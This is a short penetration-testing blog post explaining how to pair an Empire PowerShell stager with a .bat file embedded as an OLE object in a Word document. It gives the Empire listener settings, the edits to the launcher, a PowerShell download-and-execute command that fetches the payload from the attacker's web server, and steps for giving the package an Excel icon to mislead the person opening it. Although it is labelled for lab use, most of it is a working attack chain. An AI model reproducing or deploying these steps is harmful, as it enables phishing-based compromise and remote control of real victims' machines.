Empire Payload with an Object Linking & Embedding (OLE)

by @myexploit2600

Just a quick blog post, which was inspired by a chat I had with my mate @SecEventsPen

For lab use only – Thanks to the crew who created and support Empire https://github.com/EmpireProject/Empire/blob/master/README.md

OLE are great way to trigger a payload, the following details how to create an OLE using Empire.

Empire

root@kali:~# cd Empire/
root@kali:~/Empire# ./empire

Create the listener in Empire.

For an OLE to work you need to host the payload on a HTTP server, so unless you have access to two servers you will need to change Empires standard port of 80 to 8080, the below config takes the required change into mind.

listeners
uselistener http
set Name http
set BindIP 192.168.1.4
set Port 8080
set Host http://192.168.1.4:8080
execute
back

usestager windows/launcher_bat http
execute
back

You now need to close Empire and restart it, this is required because, when you first started Empire the service would of defaulted to port 80, the restart forces your defined port change of 8080.

Open your payload created by Empire,

/tmp/launcher.bat

And you need to delete two sections, the first is from the start and the second is at the end of the created payload, if you don’t your payload will fail when used as an OLE.

The following details the sections you need to delete;

From the start of the payload

@echo off
start /b

And from the end

start /b "" cmd /c del "%~f0"&exit /b

This should leave you with the PS one liner starting with

powershell -noP -sta -w 1 -enc

Copy and paste the payload into a notepad doc and save it, (For lab use I tend to call my payloads powershell_attack.txt, a nod to to Sir Kennedy of trustedsec fame.) and then move the file over to the following directory

/var/www/html

Now you can start apache2

root@kali:~/Empire# service apache2 start

If you see the following error, see directly below;

Job for apache2.service failed because the control process exited with error code.
See "systemctl status apache2.service" and "journalctl -xe" for details.

This is because Empire is still using port 80, so you just need to recheck that Empire listener is set to port 8080, if it is not, just repeat the listener as detailed above and then stop and restart Empire, then restart apache2.

So now you should have Empire listening on port 8080 and Apache running on port 80

Open a Windows VM, if you don’t have a Windows VM grab one from here https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/

Once your Windows test host is running you need to create the .bat, open notepad and paste in the following, please add your own IP address were stated.

powershell.exe -exec bypass -c "IEX (new-object system.net.webclient).downloadstring('http://Add-Your-Own-IP-Address/powershell_attack.txt')"

Run the .bat file to check it works, what it should do is connect to your apache2 server, download the payload and execute it, hopefully your see similar to the directly below response.

[+] Initial agent GWMRH158 from 192.168.1.5 now active (Slack)

If you see nothing, using your Windows host I would directly browse to http://Add-Your-Own-IP-Address/powershell_attack.txt to verify that you can see the payload in your browser, if you can’t this will be your problem, if you can, copy all of the payload, and paste into CMD and you should get a shell back, if not there is a problem with the payload, try and repeat the creation stage.

So if the above is all working, it is now time to embed the .bat into an office document.

Open Word, add some content.

Click on Object, Object again.

Pull down and select Package, and tick Display as icon.

Click on Change Icon, and locate your Office images C:\Program Files\Microsoft Office\Office14 select any image that suits your requirement.

Rename the Package or just delete it, click OK.

Add the location of the .bat file which you created, this will embed the .bat with your defined image, into the word document.

Name it, click Finish.

Verify that all looks right, then to test, double click the OLE, which looks like an excel document.

You should see a warning, and following clicking Run you will see a session in Empire.